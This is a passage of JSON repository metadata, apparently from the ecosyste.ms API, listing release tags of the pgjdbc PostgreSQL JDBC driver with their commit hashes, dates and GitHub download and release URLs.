ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.15-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.15-rc1/manifests"},{"name":"REL42.2.14","sha":"acd0724411fc5dde7a57263c48013048e001c641","kind":"tag","published_at":"2020-06-10T16:56:14.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.14","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.14/manifests"},{"name":"REL42.2.14-rc1","sha":"acd0724411fc5dde7a57263c48013048e001c641","kind":"tag","published_at":"2020-06-10T14:44:56.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.14-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.14-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.14-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.14-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.14-rc1/manifests"},{"name":"REL42.2.13","sha":"e63584cfb2bbb904a971a0b19cb4857249e0b8e2","kind":"tag","published_at":"2020-06-04T14:41:33.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.13","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.13/manifests"},{"name":"REL42.3.0-rc1","sha":"14b62aca4764d496813f55a43d050b017e01eb65","kind":"tag","published_at":"2020-06-01T13:06:47.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.0-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.0-rc1/manifests"},{"name":"REL42.2.13-rc1","sha":"ff368032bd539c8b8adac09b7a64d3788281db4d","kind":"tag","published_at":"2020-05-28T13:42:42.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.13-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.13-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.13-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.13-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.13-rc1/manifests"},{"name":"v42.2.13-rc1","sha":"c6b3cd5468c93068c5b528773ca990b9f0b29a1a","kind":"tag","published_at":"2020-05-27T14:41:44.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/v42.2.13-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/v42.2.13-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@v42.2.13-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/v42.2.13-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/v42.2.13-rc1/manifests"},{"name":"REL42.2.12","sha":"f06c15eac9d517f08bc21913fb20ee47b125d40b","kind":"tag","published_at":"2020-03-31T18:52:10.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.12","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.12/manifests"},{"name":"REL42.2.11","sha":"2083cf472be3006a01493b8fe42de54eabf9ba07","kind":"tag","published_at":"2020-03-10T15:38:39.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.11","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.11/manifests"},{"name":"v42.3.0-rc5","sha":"a7d6e00b8281faaf6ff07b06a60d3291763afb8c","kind":"tag","published_at":"2020-03-04T21:09:06.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/v42.3.0-rc5","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/v42.3.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@v42.3.0-rc5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/v42.3.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/v42.3.0-rc5/manifests"},{"name":"v42.3.0-rc2","sha":"2c1e0ef343050cb880b896abb142b2312d6988a7","kind":"tag","published_at":"2020-03-01T18:39:19.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/v42.3.0-rc2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/v42.3.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@v42.3.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/v42.3.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/v42.3.0-rc2/manifests"},{"name":"v42.3.0-rc1","sha":"860979fd94d7e87ef33c6535b30eb2e8cd80acdd","kind":"tag","published_at":"2020-03-01T18:19:13.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/v42.3.0-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/v42.3.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@v42.3.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/v42.3.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/v42.3.0-rc1/manifests"},{"name":"REL42.2.10","sha":"c81913658858c623ebc4582eb703c2d8e21212ee","kind":"tag","published_at":"2020-02-06T18:49:59.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.10","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.10/manifests"},{"name":"REL42.2.9","sha":"29c65312a110b1ed9811930547540ebb34188e15","kind":"tag","published_at":"2019-12-07T14:12:18.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.9","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.9/manifests"},{"name":"REL42.2.8","sha":"33e74f5c2239ea79a9dffb13eb1a3eb8625b3d9a","kind":"tag","published_at":"2019-09-13T17:05:06.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.8","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.8/manifests"},{"name":"REL42.2.7","sha":"443521738ab6ab6bcc4a4a8eaaf632899228dc4d","kind":"tag","published_at":"2019-09-10T12:39:02.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.7","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.7/manifests"},{"name":"REL42.2.6","sha":"cf42ba2a804d81a49e91e26c772fbed3d5eb43be","kind":"tag","published_at":"2019-06-19T19:49:54.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.6","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.6/manifests"},{"name":"REL42.2.5","sha":"a1a5ae4f2283d4557f36756d1a0228310a3acccb","kind":"tag","published_at":"2018-08-27T15:38:32.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.5","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.5/manifests"},{"name":"REL42.2.4","sha":"b3821baff00a9517f40278b5160a7495fa42a7ad","kind":"tag","published_at":"2018-07-14T13:42:27.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.4","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.4/manifests"},{"name":"REL42.2.3","sha":"220c02fce06980733163020634f97cf2d8483f39","kind":"tag","published_at":"2018-07-12T09:44:17.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.3","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.3/manifests"},{"name":"REL42.2.2","sha":"c9b1678f519243cb4b044e1bc7cab59070ac1a58","kind":"tag","published_at":"2018-03-15T16:13:57.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.2/manifests"},{"name":"REL42.2.1","sha":"7bb4ebc1c5775a0dca0adf8d760acd5336d355fc","kind":"tag","published_at":"2018-01-25T15:42:20.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.1/manifests"},{"name":"REL42.2.0","sha":"0bbd405590d898a184d5f46331cc803c5a1b22c6","kind":"tag","published_at":"2018-01-17T17:22:39.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.0","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.0/manifests"},{"name":"REL42.1.4","sha":"32fb99e7a8a583e057a9f59e8e5bac1571701233","kind":"tag","published_at":"2017-08-01T17:09:32.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.1.4","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.1.4/manifests"},{"name":"REL42.1.3","sha":"29fe74ee13300811aa05dd233d149763203ef40f","kind":"tag","published_at":"2017-07-14T08:36:31.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.1.3","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.1.3/manifests"},{"name":"REL42.1.2","sha":"de44a7623a05e2b4d075c84692cda2ab7a208157","kind":"tag","published_at":"2017-07-12T15:23:04.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.1.2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.1.2/manifests"},{"name":"REL42.1.1","sha":"2e2ac0d294168d1896a90da470864c12af491a6b","kind":"tag","published_at":"2017-05-05T22:20:33.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.1.1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.1.1/manifests"},{"name":"REL42.1.0","sha":"95e06e744ea3b9f4ff7de856d227d64fba32e45e","kind":"tag","published_at":"2017-05-04T21:02:39.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.1.0","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.1.0/manifests"},{"name":"REL42.0.0","sha":"e06a13ad8f17d04e98087039b6e346474b20e257","kind":"tag","published_at":"2017-02-18T19:26:41.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.0.0","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.0.0/manifests"},{"name":"REL9.4.1212","sha":"4d7a7618adb6c2b3a82a770d84747aeee4b55384","kind":"tag","published_at":"2016-11-02T17:09:55.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9.4.1212","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9.4.1212","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9.4.1212","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9.4.1212","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9.4.1212/manifests"},{"name":"REL9.4.1211","sha":"f808def0c90114f8912135553a77fe3d7625e9db","kind":"tag","published_at":"2016-09-18T13:55:10.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9.4.1211","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9.4.1211","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9.4.1211","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9.4.1211","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9.4.1211/manifests"},{"name":"REL9.4.1210","sha":"b29c95fa924eca19c002b8d21e2e216646c18faa","kind":"tag","published_at":"2016-09-06T20:46:24.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9.4.1210","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9.4.1210","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9.4.1210","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9.4.1210","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9.4.1210/manifests"},{"name":"REL9.4.1209","sha":"51684d9a898e8b6853e04d01b2f99e06e01e55dd","kind":"tag","published_at":"2016-07-15T13:00:15.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9.4.1209","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9.4.1209","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9.4.1209","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9.4.1209","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9.4.1209/manifests"},{"name":"REL9.4.1208","sha":"5b4c6fad736d71f5ed654ac4e2913b006591c8fe","kind":"tag","published_at":"2016-02-19T19:35:17.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9.4.1208","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9.4.1208","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9.4.1208","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9.4.1208","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9.4.1208/manifests"},{"name":"REL9.4.1207","sha":"f17e2f3074a95dc767d6d896ffd696e045b48466","kind":"tag","published_at":"2015-12-22T20:21:30.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9.4.1207","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9.4.1207","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9.4.1207","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9.4.1207","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9.4.1207/manifests"},{"name":"REL9_4_1206","sha":"e0a9b414eab3e1186e9af0450aaa9dfbf096f59e","kind":"commit","published_at":"2015-11-25T20:49:57.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9_4_1206","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9_4_1206","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9_4_1206","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_4_1206","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_4_1206/manifests"},{"name":"REL9_4_1205","sha":"fe777e75aa1a8098edc5de44d97895049f4f6518","kind":"commit","published_at":"2015-11-03T15:48:32.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9_4_1205","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9_4_1205","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9_4_1205","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_4_1205","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_4_1205/manifests"},{"name":"REL9_3_1104","sha":"de86e79d80ed08580fe0019d0696e9591035902c","kind":"commit","published_at":"2015-10-09T19:11:38.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9_3_1104","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9_3_1104","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9_3_1104","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_3_1104","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_3_1104/manifests"},{"name":"REL9_4_1204","sha":"a194c5e5429bb6edb0465b6fd254ea1d78237f54","kind":"commit","published_at":"2015-10-09T18:55:53.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9_4_1204","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9_4_1204","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9_4_1204","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_4_1204","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_4_1204/manifests"},{"name":"REL9_4_1203","sha":"a0bafcd8158b1938159fb49894fa403e04238267","kind":"commit","published_at":"2015-09-17T21:10:31.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9_4_1203","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9_4_1203","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9_4_1203","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_4_1203","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_4_1203/manifests"},{"name":"REL9_4_1202","sha":"8e3e868792a27625c65021f7733661614c02aaa0","kind":"commit","published_at":"2015-08-27T20:45:34.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9_4_1202","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9_4_1202","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9_4_1202","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_4_1202","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_4_1202/manifests"},{"name":"REL9_4_1201","sha":"a4f8c9ecfe0cf8f162f49bdfd8db5ff0baedb233","kind":"commit","published_at":"2015-02-25T16:00:34.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9_4_1201","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9_4_1201","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9_4_1201","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_4_1201","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_4_1201/manifests"},{"name":"REL9_4_1200","sha":"77ab3f6c92e931bc44ed97248ab367a4c798b687","kind":"tag","published_at":"2015-01-28T12:36:32.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9_4_1200","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9_4_1200","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9_4_1200","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_4_1200","manifests_url":"https://repos.ecosyste.ms/a